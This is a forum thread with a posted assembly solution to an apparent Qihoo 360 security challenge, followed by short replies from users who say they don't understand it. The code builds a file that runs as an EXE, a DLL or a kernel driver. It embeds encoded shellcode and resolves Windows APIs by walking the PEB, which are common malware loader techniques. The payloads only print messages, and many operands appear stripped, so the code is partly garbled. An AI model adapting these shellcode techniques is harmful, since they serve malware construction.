奇虎360第四题的解法-电脑维修论坛-网络故障技术-办公中国打印机论坛

adminhacker 发表于 2011-9-8 23:44:46

奇虎360第四题的解法

代码:
;@echo off
;goto make

.386
.model flat, stdcall
option casemap:none

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                               I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data

ShellCodeExedb 0ebh,00eh,05bh,04bh,033h,0c9h,0b1h,09bh,080h,034h,00bh,0feh,0e2h,0fah,0ebh,005h
            db 0e8h,0edh,0ffh,0ffh,0ffh,017h,07bh,0feh,0feh,0feh,0a1h,09ah,05fh,0ceh,0feh,0feh
            db 0feh,075h,0beh,0f2h,075h,08eh,0e2h,053h,075h,096h,0f6h,075h,009h,094h,0fch,0a7h
            db 016h,0dbh,0feh,0feh,0feh,01ch,007h,096h,0cdh,0cch,0feh,0feh,096h,08bh,08dh,09bh
            db 08ch,0aah,001h,0e8h,075h,016h,094h,0ffh,0a7h,016h,0f2h,0feh,0feh,0feh,01ch,007h
            db 0afh,0a9h,0a9h,0afh,001h,0a8h,0f6h,001h,0a8h,0fah,0afh,0a8h,075h,08bh,0c2h,075h
            db 08ah,0d0h,086h,0fdh,00bh,0a8h,075h,088h,0deh,0fdh,00bh,0cdh,037h,0b7h,0bfh,053h
            db 0fdh,03bh,0cdh,025h,0f1h,040h,0eeh,0c4h,028h,08ah,0f6h,03fh,035h,0f9h,0fdh,024h
            db 0beh,015h,00fh,0c5h,0e1h,08bh,019h,0a0h,075h,0a0h,0dah,0fdh,023h,098h,075h,0f2h
            db 0b5h,075h,0a0h,0e2h,0fdh,023h,075h,0fah,075h,0fdh,03bh,055h,0a0h,0a7h,03dh,016h
            db 088h,001h,001h,001h,0cch,08ah,06fh,0f2h,09dh,077h,02fh,0b1h,094h,0f4h,0c6h,0e0h
            db 'i am in exe',0;

ShellCodeDll db 0E9h,096h,000h,000h,000h,05Ah,064h,0A1h,030h,000h,000h,000h,08Bh,040h
         db 0Ch,08Bh,070h,01Ch,0ADh,08Bh,040h,008h,050h,052h,06Ah,00Ch,0E8h,01Eh
         db 00h,000h,000h,05Bh,083h,0C3h,00Dh,053h,0FFh,0D0h,083h,0C3h,007h,053h
         db 6Ah,00Bh,0E8h,00Ch,000h,000h,000h,05Bh,083h,0C3h,00Ch,06Ah,000h,053h
         db 53h,06Ah,000h,0FFh,0D0h,08Bh,0D8h,083h,0C0h,03Ch,08Bh,000h,003h,0C3h
         db 80h,038h,050h,075h,049h,08Bh,040h,078h,003h,0C3h,050h,08Bh,0C8h,08Bh
         db 49h,014h,08Bh,040h,020h,003h,0C3h,055h,08Bh,0E8h,033h,0D2h,051h,08Bh
         db 00h,003h,0C3h,08Bh,0F8h,08Bh,074h,024h,014h,08Bh,04Ch,024h,010h,0FCh
         db 0F3h,0A6h,075h,017h,083h,0C4h,004h,08Bh,044h,024h,004h,08Bh,040h,01Ch
         db 03h,0C3h,0C1h,0E2h,002h,003h,0C2h,08Bh,000h,003h,0C3h,0EBh,00Bh,042h
         db 83h,0C5h,004h,08Bh,0C5h,059h,0E2h,0CCh,033h,0C0h,05Dh,059h,0C2h,004h
         db 00h,0E8h,065h,0FFh,0FFh,0FFh,04Ch,06Fh,061h,064h,04Ch,069h,062h,072h
         db 61h,072h,079h,041h,000h,075h,073h,065h,072h,033h,032h,000h,04Dh,065h
         db 73h,073h,061h,067h,065h,042h,06Fh,078h,041h,000h
         db 'i am in the dll',0;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

;                                     C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.code

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                            GetKernel32
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetKernel32 proc uses esi
assume fs:nothing
mov eax,fs:
assume fs:error
mov eax,
mov esi,
lodsd
mov eax,
ret
GetKernel32 endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                            MyGetProcAddress
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
MyGetProcAddress proc uses ebx ecx esi edi ImageBase:DWORD,FuncName:DWORD
LOCAL FunNameArray:DWORD
LOCAL PE:DWORD
LOCAL Count:DWORD
LOCAL IED:DWORD
LOCAL iedN:DWORD
LOCAL flen:DWORD

mov Count,0

   mov eax,FuncName
test eax,eax
je tmpret
lea edx,DWORD PTR ds:
   strloop:
mov cl,BYTE PTR ds:
inc eax
test cl,cl
jnz strloop

sub eax,edx
   tmpret:

   mov flen,eax

mov eax,ImageBase
add eax,3ch
mov eax,
add eax,ImageBase
cmp DWORD PTR ,00004550h
jne NotFound
mov PE,eax
mov eax,
add eax,ImageBase
mov IED,eax
mov eax,
add eax,ImageBase
mov iedN,eax
mov eax,IED
mov eax,
add eax,ImageBase
mov FunNameArray,eax
mov ecx,IED
mov ecx,
FindLoop:
mov eax,
add eax,ImageBase
mov esi,FuncName
mov edi,eax
push ecx
mov ecx,flen
cld
repe cmpsb
jne FindNext
add esp,4
mov eax,IED
mov eax,
add eax,ImageBase
shl Count,1

add eax,Count
mov eax,
and eax,0000ffffh
mov ebx,eax
mov eax,IED
mov eax,
add eax,ImageBase
shl ebx,2
mov eax,
add eax,ImageBase
jmp Found
FindNext:
inc Count
add FunNameArray,4
mov eax,FunNameArray
pop ecx
loop FindLoop
NotFound:
xor eax,eax
Found:
ret
MyGetProcAddress endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

;                         usermain
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
usermain proc
LOCAL hKer32:DWORD
LOCAL pGetModuleHandle:DWORD
invoke GetKernel32
mov hKer32,eax

call GetHandle
db "GetModuleHandleA",0
GetHandle:
push hKer32
call MyGetProcAddress
mov pGetModuleHandle,eax

push NULL
call pGetModuleHandle

   cmp eax,10000h
jne dll
lea eax,ShellCodeExe
   call eax
   jmpTheEnd

dll:
         call @F
         @@:
         pop ebx
         sub ebx,offset @B
         lea eax,
   call eax
         jmpTheEnd
TheEnd:
ret
usermain endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                            GetKernel
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetKernel proc uses ecx
mov eax,
FindMZ:
and eax,0fffff000h
cmp word ptr ,'ZM'
jne MoveUp
mov ecx,
add ecx,eax
cmp word ptr ,'EP'

je Found
MoveUp:
sub eax ,1000h
jmp FindMZ
Found:
ret
GetKernel endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                            MyDbgPrint
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
MyDbgPrint proc hKer:DWORD
call DbgPrt
db "DbgPrint",0
DbgPrt:
push hKer
call MyGetProcAddress
call MyDbgPrt
db "I am in the kernel!",13,10,0
MyDbgPrt:
call eax
ret
MyDbgPrint endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                                     DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING

call tmpadd1
tmpadd1:
pop eax
cmp eax,7fffffffh
ja kernel
invoke usermain
jmp useret
kernel:
invoke GetKernel
invoke MyDbgPrint,eax
mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret
useret:
ret 0

DriverEntry endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

end DriverEntry

:make

set drv=kyo

\masm32\bin\ml /nologo /c /coff %drv%.bat
\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj

del %drv%.obj

echo.

VICTOR1984 发表于 2011-9-9 00:18:36

太高深了。整点实用的，

d1111b 发表于 2011-9-9 09:05:19

高手啊就是看不懂

18270508770 发表于 2011-9-11 11:58:52

碰到高手啦，硬是看不懂

cdys397222629 发表于 2011-9-11 15:06:25

{:5_488:}

youhaixu 发表于 2011-9-14 05:56:20

{:5_469:} 一点都不懂呀！

珠海迪标耗材 发表于 2011-9-21 17:42:04

太高的

页: [1]

办公中国打印机论坛's Archiver

奇虎360第四题的解法